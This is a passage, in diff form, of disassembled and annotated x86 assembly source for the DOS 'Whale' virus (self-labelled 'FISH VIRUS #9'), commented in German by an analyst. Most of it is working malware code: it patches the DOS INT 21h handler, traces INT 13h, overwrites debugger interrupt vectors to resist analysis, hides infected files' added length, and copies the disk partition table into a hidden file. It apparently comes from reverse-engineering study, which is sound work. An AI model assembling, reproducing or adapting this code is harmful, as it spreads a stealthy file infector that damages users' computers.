+J0284C: MOV AX,CS:[BX]
+ ADD BX,+02h
+
+J02852: JZ J0287E ; = RET nach altem BX
+ ADD CS:[BX],AX
+ LOOP J0284C
+ POP BX
+ DB 9fh,06h
+;=====================================================================
+;==================( folgender Code wird an Adresse 2566h erzeugt )===
+;=====================================================================
+;@INT21: DW 2568h ; fr "call word ptr [@int21]"
+;D2568: PUSHF
+; CALL FAR CS:[Low_INT_21H] ; CALL OLD INT 21
+; RET
+;---------------------------------------------------------------------
+CreateTempCode: MOV Word Ptr DS:[@INT21 ],Offset @INT21+2
+ POP BX
+ MOV WORD Ptr DS:[@INT21+2],2E9Ch
+ ADD BX,+02h ; SIC !
+ MOV WORD Ptr DS:[D256A],1EFFh
+ MOV WORD Ptr DS:[D256C],OFFSET Low_INT_21H
+ PUSH BX
+ MOV WORD Ptr DS:[D256E],00C3h
+J0287E EQU $-1 ; zeigt auf "RET"
+ MOV WORD Ptr DS:[Vir_SP],2700h
+EIN_RETURN: RETN ; RETURN 2 Byte weiter
+;=====================================================================
+;---------------------------------------------------------( Trash )---
+J02887: PUSH CX
+ MOV CX,CS:[BX]
+ DB 2eh,8bh,1Eh
+;=====================================================================
+;====================================( Teil-Initialisierung von SI)===
+;====================================( IRET fhrt nach J02983 )===
+;====================================( Wird als erstes ausgefhrt )===
+;=====================================================================
+J0288E: POP BX
+ ADD BX,OFFSET J02983-Offset Vir_NAME
+ PUSHF
+ PUSH CS
+ PUSH BX
+ MOV SI,BX ; BX = SI = 2983h
+ IRET
+;---------------------------------------------------------( Trash )---
+ DB 0E9h,031h,002h,0ffh,0b4h,029h
+ DB 001h,059h,02eh,0ffh,007h,02eh
+ DB
023h,037h,05fh,0f3h,0a4h,0EBh
+;====================================================================
+J028AB: PUSH DS ; altes DS auf Stack
+ PUSH CS
+ POP DS
+ CALL CreateTempCode ; Return ist 1 word weiter !
+ ;--------------
+ DW 58EAh
+ ;--------------
+;=====================================================================
+;==================================================( Code-Patcher )===
+;=====================================================================
+; BX zeigt auf J03047
+; aus "CMP BX,SI"
+; wird
+; J03074: XOR CS:[SI],BX
+; NOP
+; RET
+;---------------------------------------------------------------------
+;
+J028B3: MOV BX,OFFSET J03047-Offset VirStart
+ XOR WORD Ptr DS:[BX],0EF15h
+ ADD BX,+02h
+ XOR WORD Ptr DS:[BX],4568h
+ MOV SI,OFFSET J0491A-OFFSET VirStart
+ POP DS ; Altes DS zurck
+ CALL PATCH ; Gleich ausfhren !
+;=====================================================================
+;======================================( WAL ist jetzt erst scharf)===
+;=====================================================================
+AFTER_PATCH: MDECODE 1
+
+ CALL StopINT_02
+
+ MOV CS:[D24E3],AX
+ MOV AH,52h ; sic !
+ MOV CS:[PSP_SEG],DS
+ INT 21
+ MOV AX,ES:[BX-02h] ; Hole ersten MCB !
+ MOV CS:[D2447],AX
+ PUSH CS
+ POP DS
+
+ MOV AL,21h
+ CALL GetInt_AL
+
+ MOV WORD PTR DS:[Trace_Adres+2],ES ; Get INT 21h
+ MOV WORD PTR DS:[Trace_Adres ],BX
+
+ MOV DX,Offset Int_01_entry-Offset VirStart
+ MOV AL,01h
+ MOV BYTE Ptr DS:[D2450],00h ; keinen bergehen
+ CALL SetInt_AL ; SET INT 01
+ MCODE 1
+;=====================================================================
+;===================================================(TRACE INT 21h)===
+;=====================================================================
+ MDECODE 2
+ ;-----------------------------
+ PUSHF
+ POP AX
+ OR AX,0100h ; Tf ein
+ PUSH AX
+ POPF
+ ;-----------------------------
+ PUSHF
+ MOV AH,61h
+ CALL DWORD PTR DS:[Trace_Adres]; TRACE INT 21
+ ;-----------------------------
+ PUSHF
+ POP AX
+ AND AX,0FEFFh ; TF aus
+ PUSH AX
+ POPF
+ ;-----------------------------
+ LES DI,DWORD PTR DS:[Trace_Adres] ; Old int 21h
+ ;-----------------------------
+ ; Erzeugt JMP CS:2256/J04A66
+ ;-----------------------------
+ MOV WORD PTR DS:[Low_INT_21H+2],ES
+ MOV BYTE Ptr DS:[D244B ],0EAh
+ MOV WORD Ptr DS:[D244C ],2256h
+ MOV WORD PTR DS:[Low_INT_21H ],DI
+ MOV WORD PTR DS:[D244E ],CS
+ ;-----------------------------
+ CALL J0298D
+ CALL Patch_IBMDOS
+ MCODE 2
+ CALL Wal_Ins_MEMTOP_Kopieren
+;=====================================================================
+ ; Wal entschwindet zur Speicherobergrenze, husch .....
+;#####################################################################
+;
+;#####################################################################
+;=====================================================================
+;====================================( PATCHT INT 09-Verarbeitung )===
+;=====================================================================
+INT_09_Patch: MDECODE 3
+ PUSH BX
+ PUSH ES
+
+ MOV AL,09h ; GET INT 09
+ CALL GetInt_AL
+
+ MOV WORD PTR CS:[INT_09+2],ES
+ MOV WORD PTR CS:[INT_09 ],BX
+
+ MOV BYTE PTR CS:[D2570],0EAh ; PATCHE "JMP CS:2273"
+ MOV WORD PTR CS:[D2573],CS ; INS SCRATCHPAD
+ MOV WORD PTR CS:[D2571],Offset J04A83-Offset VirStart
+ ; = JMP CS:4A83
+
+ CALL Patch_INT_09
+ POP ES
+ POP BX
+J02975: MOV BYTE PTR CS:[D2587],00h
+
+ MCODE 3
+ RETN
+;------------------------------
+ DW 027E9H
+ DW 0EA1Ah
+;=====================================================================
+;============================================( Get Virstart in SI )===
+;=====================================================================
+J02983: SUB SI,OFFSET J02983 - Offset VirStart
+ JMP J02F15 ; SI ist jetzt 2810h
+;=====================================================================
+ DB 089h,0F3h,0E8H
+;=====================================================================
+;=========================================( Get INT 2F and INT 13 )===
+;=====================================================================
+J0298D: MDECODE 4
+
+ MOV AL,2Fh ; GET INT 2F
+ CALL GetInt_AL
+
+ MOV BX,ES
+ CMP CS:[D2447],BX
+ JNB J029BC
+
+ CALL Trace_int_13h
+
+ MOV DS,WORD PTR CS:[Trace_Adres+2]
+ PUSH WORD PTR CS:[Trace_Adres ]
+ POP DX ; DS:DX
+
+ MOV AL,13h
+ CALL SetInt_AL ; SET INT 13
+
+ XOR BX,BX
+ MOV DS,BX ; DS = 0
+ MOV BYTE Ptr DS:[0475h],02h ; Number of Hard-Drives
+
+J029BC: MCODE 4
+ RETN
+;=====================================================================
+;==========================( Erste Routine, die im Oberen Speicher)===
+;==========================( ausgefhrt wird. )===
+;==========================( AB JETZT ist Offset 2810h = OFFSET 0 )===
+;=====================================================================
+J029C1: MDECODE 5
+ CALL Patch_IBMDOS ; Original wiederherstellen
+ MOV CS:[D244E],CS ; JMP CS:2256 korrigieren..
+ ; ist jetzt bei 4A66 ...
+ CALL Patch_IBMDOS ; und wieder Patchen
+
+ PUSH CS
+ POP DS
+ PUSH DS
+ POP ES ; ES=DS=CS
+ CALL INT_09_Patch ; Patche INT 09
+
+ MOV BYTE Ptr DS:[InfectFlag],00h
+ CALL Re_SET_Int_02
+
+ MOV AX,[PSP_SEG]
+ MOV ES,AX
+ LDS DX,ES:[000Ah] ; INT 22h in DS:DX
+ MOV DS,AX
+ ADD AX,0010h
+ ADD CS:[OFFSET EXE_Reloc_Ofs-Offset VirStart],AX
+
+ CMP BYTE PTR CS:[OFFSET EXE_FLAG-OFFSET VIRSTART],00h
+ ; IST ES EIN EXE ??
+ STI
+ MCODE 5
+ JNZ J02A2E
+;=====================================================================
+;================================( restore Code-Start im alten CS )===
+;=====================================================================
+ MDECODE 6
+ MOV AX,CS:[Offset EXE_ID-Offset VirStart ]
+ MOV WORD PTR DS:[0100h],AX
+ MOV AX,CS:[Offset EXE_ID-Offset VirStart+2]
+ MOV WORD PTR DS:[0102h],AX
+ MOV AX,CS:[Offset EXE_ID-Offset VirStart+4]
+ MOV WORD PTR DS:[0104h],AX
+
+ PUSH CS:[PSP_SEG] ; PUSH Start-Segment
+ XOR AX,AX
+ INC AH
+ PUSH AX ; AX = 100h
+ MOV AX,CS:[D24E3]
+ MCODE 6
+ RETF ; == JMP PSP_SEG:100H == COM-START
+;=====================================================================
+;=============================================( JMP zum EXE-Start )===
+;=====================================================================
+J02A2E: MDECODE 7
+ ADD CS:[SS_INIT],AX
+ MOV AX,CS:[D24E3]
+ MOV SP,CS:[SP_INIT]
+J02A41: MOV SS,CS:[SS_INIT]
+ MCODE 7
+ JMP DWORD PTR CS:[CODE_INIT]
+;=========================================================(trash !)===
+J02A4F: PUSH AX
+ MOV AX,0000h
+ MOV DS,AX
+ POP AX
+ MOV BX,Word ptr CS:[06C7h] ; CS:2ED7 = E3CB
+ MOV Word Ptr DS:[000CH],BX ; INT 3 setzen !
+ MOV Word Ptr DS:[000EH],CS
+ DB 0E8h ; CALL 5DBA ?!?
+;=====================================================================
+;==============================================( TRACE-ROUTINE )======
+;=====================================================================
+J02A63: PUSH BP
+ XOR BX,BX
+ MOV BP,SP
+ MOV DS,BX
+ AND WORD Ptr [BP+06h ],0FEFFh ; ? Change Flags ?
+ MOV Word Ptr DS:[0004h],AX
+ MOV Word Ptr DS:[000Eh],CS ; SET INT 3 SEGMENT
+ MOV Word Ptr DS:[000Ch],SI ; SET INT 3 OFFSET
+ CALL J02CD8 ; Kein Return, sondern
+ ; sowas wie 'IRET'
+;=====================================================================
+J02A7D:
+;======================================================( Trash ???)===
+ DB 0E9h,0f2h,0eh
+ DB 0BEh ;02A80
+ DB 0BBh ;02A81
+ DB 0ABh ;02A82
+ DB 0EBh ;02A83
+ DB 0EFh ;02A84
+ DB 0AFh ;02A85
+ DB 0BBh ;02A86
+ DB 0EFh ;02A87
+ DB 2 DUP (0ABh) ;02A88
+ DB 2 DUP (0BFh) ;02A8A
+ DB 0EFh ;02A8C
+ DB 0ABh ;02A8D
+ DB 0EBh ;02A8E
+ DB 2 DUP (0ABh) ;02A8F
+ DB 0BFh ;02A91
+ DB 0EBh ;02A92
+ DB 0EFh ;02A93
+ DB 0EBh ;02A94
+ DB 2 DUP (0ABh) ;02A95
+ DB 0FBh ;02A97
+ DB 0ABh ;02A98
+ DB 0EBh ;02A99
+ DB 0BFh ;02A9A
+ DB 0BBh ;02A9B
+ DB 0BFh ;02A9C
+ DB 0ABh ;02A9D
+ DB 0EBh,2Eh,80h,0fh
+ DB 0abh,0e2h,0f9h
+;=====================================================================
+;---( Hier wird der Code neu reloziert, so da Virstart zum )---
+;---( Offset 0 wird. Dazu wird das neue Codesegment errechnet und )---
+;---( spter ber RETF angesprungen. Die Routine muss ausgefhrt )---
+;---( werden, bevor der Code scharf gemacht wird. Der Patcher )---
+;---( geht vom neuen Codesegment aus. )---
+;=====================================================================
+Relokator: CALL DecodeFollowingCode
+J02AA8: xor sp,sp ; Stack verwerfen !
+ call L2AAD
+L2AAD: mov bp,ax ; AX = 0
+ mov ax,cs
+ mov bx,0010H
+ mul bx ; AX = CS * 16
+ pop cx ; CX = Offset L2AAD
+ sub cx,OFFSET L2AAD-OFFSET VIRSTART
+ ; CX = Offset L2AAD - 29D
+ ; = Offset VirStart = 2810h
+ add ax,cx ; DX:AX := CS*10+2810
+ adc dx,0000 ;
+ div bx ; DX:AX := CS+281
+ push ax ; Ergebnis auf Stack,
+ ; (== Segment Returnadresse )
+ mov ax,Offset J028AB-Offset VirStart
+ ; Offset Returnadresse ; (CS+281h):09Bh
+
+ push ax
+ mov ax,bp ; AX = 0
+ call VersteckeCodeWieder
+J02ACC: retf ; RETURN nach CS:28AB, immer !
+;===========================================================(trash)===
+J02ACD: DB 0B4h,03 ; MOV AH,03h
+ DB 8bh,0D8h ; MOV BX,AX
+ DB 0E9H ; JMP J02BBC
+;=====================================================================
+;=============================================( Setzen von INT 01 )===
+;=====================================================================
+J02AD2: CALL J02AD5
+J02AD5: POP BX ; BX = 2AD5
+ SUB BX,OFFSET J02AD5-OFFSET J02A63
+ ; BX = 2A63
+ PUSH BX ;
+ POP WORD PTR DS:[0004h] ; INT 01 Offset = 2A63
+ PUSH CS
+ POP WORD PTR DS:[0006h] ; INT 01 Segment= CS
+ PUSH CS
+J02AE4: POP AX
+ OR AX,0F346h ; SET TF
+ PUSH AX
+ POPF
+
+J02AEA: XLAT ; MOV AL,[BX+AL]
+ MOV BH,AL ; MOV AL,[2AA9+x]
+ ADD BX,CX
+J02AEF: JMP J047B1
+;=========================================================( trash )===
+ MOV AX,[BX ]
+ MOV BX,[BX+SI]
+ XOR AX,AX
+ MOV DS,AX
+ JMP J02AE4
+;=====================================================================
+;==========================( wird von INT 3 / INT 21h angesprungen)===
+;=====================================================================
+J02AFB: MDECODE 8
+ push bx
+ mov bx,sp
+ mov bx,ss:[bx+06] ; HOLE Flags vom Caller-Stack
+ mov cs:[D24B3],bx ; und merke sie
+ pop bx
+
+ push bp ; BP bleibt auf Stack
+ mov bp,sp
+ call StopINT_02
+ call SaveRegisters
+ call Patch_IBMDOS
+ call GetRegsFromVirStack
+ call PUSHALL
+ MCODE 8
+;=====================================================================
+;=====================( sucht zu Wert in AL den passenden Handler )===
+;=====================================================================
+GetHandler: MDECODE 9
+ CALL PushALL
+ MOV WORD PTR CS:[D2598],OFFSET J02B8B-Offset VirStart
+ MOV BX,Offset J02B45-Offset VirStart
+ MOV CX,000Fh
+J02B38: CMP CS:[BX],AH
+ JZ J02B72
+ ADD BX,+03h
+ LOOP J02B38
+ JMP J02B7B
+;=====================================================================
+J02B45: ;=================================( Tabelle )=========
+ if_then <00fh,L0699> ; 2EA9 ; open FCB
+ if_then <011h,L04F4> ; 2D04 ; Findfirst FCB
+ if_then <012h,L04F4> ; ; Findnext FCB
+ if_then <014h,L06E0> ; 2EF0 ; Read Seq. FCB
+ if_then <021h,L06CA> ; 2EDA ; Read Random FCB
+ if_then <023h,L08CF> ; 30DF ; Get Filesize FCB
+ if_then <027h,L06C8> ; 2ED8 ; Read Rndm Block FCB
+ if_then <03dh,L0996> ; 31A6 ; OPEN FILE / HANDLE
+ if_then <03eh,L09E4> ; 31F4 ; CLOSE File / Handle
+ if_then <03fh,L1E5E> ; 466E ; READ File / Handle
+ if_then <042h,L1DA2> ; 45B2 ; SEEK / Handle
+ if_then <04Bh,L0AD4> ; 325D ; EXEC
+ if_then <04Eh,L1F70> ; 4780 ; FindFirst ASCIIZ
+ if_then <04Fh,L1F70> ; 4780 ; FindNext ASCIIZ
+ if_then <057h,L1D0F> ; 451F ; Set/Get Filedate
+;=====================================================================
+J02B72: INC BX
+ PUSH CS:[BX ]
+ POP CS:[D2598] ; Adresse in D2598
+J02B7B: CALL PopALL
+J02B7E: MCODE 9
+ JMP CS:[D2598] ; Springe zu [2598]
+;================================================================()===
+J02B87: PUSH SI ; ?!?!?!
+ JMP J0491B
+
+;=====================================================================
+;==========================================( Low-INT-21h aufrufen )===
+;=====================================================================
+J02B8B: JMP J048F3
+;=========================================================( trash )===
+ DB 043h,041h,031h,00fh,039h,00fh,077h
+;=====================================================================
+;================================================( Beendet Int21h )===
+;=====================================================================
+IRET_Int21h: MDECODE 10
+ CALL SaveRegisters
+ CALL Patch_IBMDOS
+ CALL GetRegsFromVirStack
+J02BA3: MOV BP,SP
+ PUSH CS:[D24B3] ; PUSH Flags nach IRET
+ POP [BP+06] ; POP Flags ---"----
+ POP BP
+ CALL Re_SET_Int_02
+ MCODE 10
+ IRET
+;=====================================================================
+J02BB6: DB 0D7h,03Ch,0FFh,075h
+;=====================================================================
+;=============================================( Pop alle Register )===
+;=====================================================================
+; ---------------- hilfsweise eingefgt :
+; J02BB6: XLAT
+; CMP AL,0FFh
+; JZ J02BA3
+; XCHG AL,BYTE PTR DS:[0C912H] ; MUELL !!!
+; JMP J02BBF
+; ---------------- hilfsweise eingefgt :
+; J02BBC: PUSH ES
+; ADC CL,CL
+; JMP J02BBF
+; ---------------- Ende einfgung
+;=====================================================================
+;=============================================( Pop alle Register )===
+;=====================================================================
+J02BBC EQU $+2
+PopALL: MDECODE 11
+J02BBF: POP CS:[D24EA]
+ POP ES
+ POP DS
+ POP DI
+ POP SI
+ POP DX
+ POP CX
+ POP BX
+ POP AX
+ POPF
+ MCODE 11
+ JMP CS:[D24EA]
+;=====================================================================
+ DB 0F6h
+;=====================================================================
+;==========================( Holt alle Register aus dem Vir-Stack )===
+;=====================================================================
+GetRegsFromVirstack:
+ MDECODE 12
+ MOV Word Ptr CS:[D2557],SP
+ MOV Word Ptr CS:[D2559],SS
+ PUSH CS
+ POP SS
+ MOV SP,Word Ptr CS:[Vir_SP]
+
+ CALL CS:PopALL
+
+ MOV SS,Word Ptr CS:[D2559]
+ MOV Word Ptr CS:[Vir_SP],SP
+ MOV SP,Word Ptr CS:[D2557]
+ MCODE 12
+ RETN
+;=====================================================================
+ DB 0BEh ;02C05
+ DB 0AFh ;02C06
+ DB "4" ;02C07
+ DB 0Eh ;02C08
+ DB "[SZR" ;02C09
+ DB 8Fh ;02C0D
+ DB 06h ;02C0E
+;=====================================================================
+;========( 2c0f )=======================( Patcht INT 21 in IBMDOS )===
+;=====================================================================
+Patch_IBMDOS: MDECODE 13
+;---------------------------------------------------------------------
+ MOV SI,Offset D244B
+ LES DI,CS:[Low_INT_21H]
+ PUSH CS
+ POP DS
+ CLD
+ MOV CX,0005h ; Tauscht 5 Byte im DOS aus gegen
+ ; einen FAR-JMP zur Wal-Routine !
+J02C22: LODSB
+ XCHG AL,ES:[DI]
+ MOV [SI-01h],AL
+ INC DI
+ LOOP J02C22
+ MCODE 13
+ RETN
+;=====================================================( trash ?!? )===
+J02C31: XOR AX,CX
+ INC BX
+ OR ES:[BX],AX
+ LOOP J02C31
+ MOV BX,CX
+ DB 0E8h ;...
trash ! +;===================================================================== +;============================================( pusht alle register)=== +;===================================================================== +PushALL: MDECODE 14 + POP CS:[D24EA] + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH DS + PUSH ES + MCODE 14 + JMP CS:[D24EA] +;===================================================================== +;========================================( setzt INT 01 auf Tracer)=== +;===================================================================== +SetInt_01: MDECODE 15 + MOV AL,01h + PUSH CS + POP DS + MOV DX,Offset Int_01_entry-Offset VirStart + CALL SetInt_AL ; SET INT 01 + MCODE 15 + RETN +;===================================================================== +;===========================( setzt INT ( nummer in AL) auf DS:DX )=== +;===================================================================== +SetInt_AL: MDECODE 16 + PUSH ES + PUSH BX + XOR BX,BX + MOV ES,BX + MOV BL,AL + SHL BX,1 + SHL BX,1 + MOV ES:[BX ],DX + MOV ES:[BX+02h],DS + POP BX + POP ES +J02C88 EQU $+2 + MCODE 16 + RETN +;===================================================================== +;==============================(sichert Register auf eigenem Stack)=== +;===================================================================== +SaveRegisters: MDECODE 17 + MOV CS:[D2557],SP + MOV CS:[D2559],SS + PUSH CS + POP SS + MOV SP,CS:[Vir_SP] + CALL CS:PUSHALL + MOV SS,CS:[D2559] + MOV CS:[Vir_SP],SP + MOV SP,CS:[D2557] + MCODE 17 + RETN +;===================================================================== +;==============================( holt INT ( nummer AL ) nach ES:BX)=== +;===================================================================== +GetInt_AL: MDECODE 18 + PUSH DS + PUSH SI + XOR SI,SI + MOV DS,SI + XOR AH,AH + MOV SI,AX + SHL SI,1 + SHL SI,1 + MOV BX,[SI] + MOV ES,[SI+02h] + POP SI + POP DS + MCODE 18 + RETN 
+;=====================================================================
+;=========================( Zweiter Teil der Trace-Routine J02A63 )===
+;=====================================================================
+J02CD8: POP AX ; AX = 2A7Dh
+J02CDA EQU $+1 ; = INC SI
+ ; OR [BX],AL
+ ; XCHG BX,[BP+08h] , usw.
+
+ ADD WORD Ptr [BP+08h],+07h ; Change IP after IRET ??
+ XCHG BX,[BP+08h]
+ MOV DX,BX
+ XCHG BX,[BP+02h]
+
+ SUB SI,@0478 ; = ADD SI,@FB88
+ MOV BX,SI ;
+ ADD BX,SwapCode_6 ; 04EFh
+
+ POP BP ; Original BP aus Trace-Routine
+ ; J02A63
+ PUSH CS:[SI+SwapCode_8] ; dort steht "E9CF"
+ POP AX ; AX = "E9CF"
+ XOR AX,020Ch ; AX = "EBC3"
+ MOV CS:[BX],AL ; PATCHT INT 3 WEG : INT 3 -> RET
+ ; Spielt aber gefhrlich mit der Queue,
+ ; kein Wunder, dass das Teil auf ATs
+ ; nicht funktioniert...
+ ADD AX,020Ch ; AX = EDCF
+;*********************************************************************
+CALL EIN_RETURN ;************ Eingefgt **********************
+;*********************************************************************
+J02CFF: INT 3 ; -> RET
+ ; ABER RET [SP+2] !!!!!
+ ; das heisst : Ende der Trace-Routine
+ ; ist hier.
+;=====================================================================
+J02D00: JMP J02D60
+ DB 0EBh
+;=====================================================================
+;====================( Handler fr Findfirst/Findnext FCB / AH=11 )===
+;=====================================================================
+J02D04: MDECODE 19
+ CALL PopALL
+ CALL CS:[@INT21] ; CALL INT 21H
+ OR AL,AL
+ MCODE 19
+ JZ J02D1C
+ JMP IRET_Int21h
+ ;------------------
+J02D1C: MDECODE 20
+ CALL PushALL
+ CALL GetDTA
+ MOV AL,00h
+ CMP BYTE Ptr DS:[BX],0FFh ; Extended FCB ?
+ JNZ J02D34
+
+ MOV AL,[BX+06h] ; dann Attribut -> AL
+ ADD BX,+07h ; und zum Normalen FCB
+J02D34: AND CS:[D24F0],AL ;
+ TEST BYTE Ptr DS:[BX+18h],80h; reserved..Shit
+ MCODE 20
+ JNZ J02D46
+ JMP J02EA3 ; fertig
+
+J02D46: SUB BYTE Ptr DS:[BX+18h],80h
+ CMP WORD Ptr DS:[BX+1Dh],Code_len
+ JNB J02D54
+ JMP J02EA3 ; fertig
+
+J02D54: SUB WORD Ptr DS:[BX+1Dh],Code_len
+ SBB WORD Ptr DS:[BX+1Fh],+00h
+ JMP J02EA3 ; fertig
+;=====================================================================
+J02D60: LOOP J02D66 ; wenn CX <> 0 dann J02D66
+ JMP J03251 ; sonst J03251 -> J034D4
+;---------------------------------------------------------------------
+ DB 0ebh ; TRASH !
+;---------------------------------------------------------------------
+J02D66: INC BX
+ JMP J02FA2
+;=====================================================================
+;===============================================( Suche nach Fish )===
+;=====================================================================
+Suche_Fish: MDECODE 21
+ CALL PushALL
+ IN AL,40h ; Hole Zufallszahl
+ CMP AL,40h ; ist sie < 40h, dann Partitionstabelle
+ MCODE 21 ; lesen und FISH.TBL erzeugen
+ JB J02D7F
+ JMP J02E9F ; sonst nicht.
+;=====================================================================
+;============( LESEN der Partitionstabelle bei jeder 4. Infektion )===
+;=====================================================================
+J02D7F: MDECODE 22
+ MOV AL,01h ; EINEN SEKTOR
+ MOV AH,02h ; LESEN
+ PUSH CS
+ POP BX
+ SUB BH,10h ;
+ MOV ES,BX ; NACH ES:0000h
+ MOV BX,0000h ;
+ MOV CH,00h ; SPUR 0
+ MOV CL,01h ; SEKTOR 1 ( Partitionstabelle )
+ MOV DH,00h ; 1. HEAD
+ MOV DL,80h ; 1. FESTPLATTE
+ PUSHF
+ CALL DWORD PTR CS:[Trace_Adres] ; INT 13h !
+ MCODE 22
+ JNB J02DA9
+ JMP J02E9F
+;=====================================================================
+;=========================( erzeugen der FISH.TBL als HIDDEN-File )===
+;=====================================================================
+J02DA9: MDECODE 23
+ PUSH CS
+ POP DS
+ MOV AH,5Bh ; CREATE NEW FILE
+ MOV CX,0002h ; ATTRIBUT "SYSTEM"
+ MOV DX,OFFSET D2DDB-Offset VirStart
+ ; NAME IN DS:05CBH/CS:D2DDB
+ CALL CS:[@INT21]
+ JNB J02DC2
+ JMP J02E9B
+J02DC2: PUSH ES
+ POP DS
+ MOV BX,AX
+ MOV AH,40h ; schreibe
+ MOV CX,0200h ; 200h Byte
+ MOV DX,0000h ; ab ES:0000
+ ; Partitionstabelle
+ CALL CS:[@INT21]
+ JB J02DD8
+ JMP J02E85
+J02DD8: JMP J02E9B
+ ;=============================================================
+D2DDB DB "C:\FISH-#9.TBL",0
+D2DEA DB "FISH VIRUS #9 "
+ DB "A Whale is no Fish! "
+ DB "Mind her Mutant Fish and the hidden Fish Eggs for "
+ DB "they are damaging. "
+ DB "The sixth Fish mutates only if Whale is in her Cave"
+ ;=============================================================
+J02E85: PUSH CS
+ POP DS
+ MOV AH,40h
+ MOV CX,009Bh
+ MOV DX,OFFSET D2DEA-Offset VirStart
+ CALL DS:[@INT21]
+ JB J02E9B
+ MOV AH,3Eh
+ CALL DS:[@INT21]
+J02E9B: MCODE 23
+J02E9F: CALL PopALL
+ RETN
+;---------------------------------------------------------------------
+J02EA3: CALL PopALL
+ JMP IRET_Int21h
+;=====================================================================
+;================================( Handler fr OPEN FCB , AH = 0F )===
+;=====================================================================
+J02EA9: MDECODE 24
+ CALL PopALL
+ CALL CS:[@INT21]
+ CALL PushALL
+ OR AL,AL
+ MCODE 24
+;==============================
+ JNZ J02EA3 ; fertig
+
+ MOV BX,DX
+ TEST BYTE Ptr DS:[BX+17h],80h
+ JZ J02EA3 ; fertig
+ SUB BYTE Ptr DS:[BX+17h],80h
+ SUB WORD Ptr DS:[BX+10h],Code_len ; unerkannt
+ ; bleiben
+ SBB BYTE Ptr DS:[BX+12h],00h
+ JMP J02EA3 ; fertig
+;=====================================================================
+;=============================( Handler fr Read Random Block FCB )===
+;=====================================================================
+J02ED8: JCXZ J02F08
+;=====================================================================
+;===================================( Handler fr Read Random FCB )===
+;=====================================================================
+J02EDA: MDECODE 25
+ MOV BX,DX
+ MOV SI,[BX+21h]
+ OR SI,[BX+23h]
+ MCODE 25
+ JNZ J02F08
+ JMP J02F03
+ DB 0e8h
+;=====================================================================
+;================================( Handler fr Read Seq. FCB.AH=14)===
+;=====================================================================
+J02EF0: MDECODE 26
+ MOV BX,DX ; DS:DX ist Adresse des geffneten FCB
+ MOV AX,[BX+0Ch] ;
+J02EFA: OR AL,[BX+20h]
+ MCODE 26
+ JNZ J02F08
+
+J02F03: CALL J0397A ; SAVEREGS,ES=DS, DI=DX+0Dh
+ JNB J02F55 ; Datei ist ausfhrbar
+J02F08: JMP J02B8B ; sonst : CALL LOW-INT-21
+;=====================================================================
+J02F0B: JMP J03251 ; -> J034D4
+;-----------------------------------------------------------(trash)---
+ MOV [BP+02h],DX
+ MOV [BP+04h],CX
+ DB 0EBh
+;---------------------------------------------------------------------
+;------------------------( erste Proc nach Initialisierung von SI )---
+;---------------------------------------------------------------------
+J02F15: IN AL,21h ; SI = 2810h / VirStart
+ OR AL,02h
+ OUT 21h,AL
+ XOR BX,BX
+ PUSH BX ; PUSH 0 auf Stack
+ MOV BP,0020h
+ POP DS ; DS = 0000
+ MOV CX,BP ; CX = 0020
+ CALL $+3 ; GET IP
+ POP BX ; BX = 2F27
+ PUSH BX
+ POP DX ; DX = 2F27
+ PUSH CS
+ POP AX ; AX = CS
+ ADD AX,0010h ; AX = CS:0100
+ ADD BX,AX
+ XOR DX,BX
+
+J02F33: SUB SI,@FB88 ; ADD SI,478h; SI = 2C88
+ ; AX = 5BC0
+ ; BX = 8AE7
+ ; CX = 0020
+ ; DX = A5C0
+ ; DS = 0000
+ CALL J02AD2 ;
+ ; 2F3A auf Stack als ret-adr
+ ;------>(J02EC8)----[keine Rckkehr vom CALL ! ]------
+ ;-----------------------------------------------------
+ DB 0E9H
+;=====================================================================
+;====================================================( no entry...)===
+;=====================================================================
+ MOV BYTE PTR [DI],0EBH
+ JMP J035E3 ; Erzeugt eine 7 Byte-Tabelle und checkt
+ ; Verfallsdatum
+;=====================================================================
+;====================================================( no entry...)===
+;=====================================================================
+J02F41: XCHG DX,BX
+J02F43: MOV WORD PTR DS:[0004h],BX
+ OR CX,CX
+ JZ J02F0B
+ DEC CX
+ JMP J02FA2
+;--------------------------------------------------------------------
+ DB 1Ch,00,53h,57h,0E8h
+;=====================================================================
+;============================( zum Handler fr Read Seq. FCB.AH=14)===
+;=====================================================================
+J02F55: MDECODE 27
+ CALL CS:[@INT21] ; CALL INT 21h
+ MOV [BP-08],CX
+ MOV [BP-04],AX
+ PUSH DS
+ PUSH DX
+ CALL GetDTA
+ CMP Word Ptr DS:[BX+14],1
+ MCODE 27
+ JZ J02FF6
+;==========================================( check auf infektion )===
+J02F7A: MDECODE 28
+ MOV AX,[BX ]
+ ADD AX,[BX+02h]
+ PUSH BX
+ MOV BX,[BX+04h]
+ XOR BX,5348h ; 'SH' --> 'FISH' !
+ XOR BX,4649h ; 'FI'
+ ADD AX,BX
+ POP BX
+ MCODE 28
+ JZ J02FF6
+ ADD SP,+04h
+ JMP J02EA3 ; fertig
+;=================================================================
+ DB 12h
+;=================================================================
+J02FA0: JMP J02F33
+;=================================================================
+J02FA2:
+ MOV Word PTR DS:[0004h],DX
+ MOV BX,Word Ptr DS:[000Ch]
+ IN AL,01h ;?????!??????!????
+ OR CX,CX
+ JZ J02FC0
+ CMP CL,BL
+ JB J02FC0
+ XCHG BX,DX
+ MOV Word PTR DS:[0004h],DX
+ XOR DX,AX
+ LOOP J02FA0 ; JMP J02F33, if CX <> 0
+ ; ist identisch mit
+ ; "JMP J02FC0"....
+ JZ J02FCB ; -> J03251 -> J034D4
+
+
+J02FC0: ADD SI,@0478
+ CALL J02AD2 ; ->keine Rckkehr vom CALL !<-
+;-------------------------------------------------------------------
+ DB 0E9H,0A8h,09h,0EAh
+;-------------------------------------------------------------------
+J02FCB: JMP J03251 ; -> 34d4
+;=====================( no entry )==( muss (!) ausgefhrt werden )===
+J02FCE: MOV BYTE PTR CS:[SI+SwapCode_5],0E8h
+ ; Adresse J03259
+ OR CX,CX ; Ist am anfang immer 20h
+ ; also wird 32 Mal diese Schleife
+ ; ausgefhrt und versucht, den
+ ; INT 1 zu setzen.....
+ JZ J02FCB ; Zur Arbeit !
+ ;---------------------------------------------------
+ ; INT 1 und INT 3 zerstren.
+ ;---------------------------------------------------
+ MOV Word Ptr DS:[000Ch],BX
+ XOR DX,BX
+ MOV Word Ptr DS:[0004h],DX
+ XOR AX,DX
+ MOV Word Ptr DS:[000Ch],AX
+ JMP J02D00 ; schlechter Pfad !
+;========================================================( trash )===
+J02FEA: DB 081h,0c6h,090h,034h,0b9h,01ch
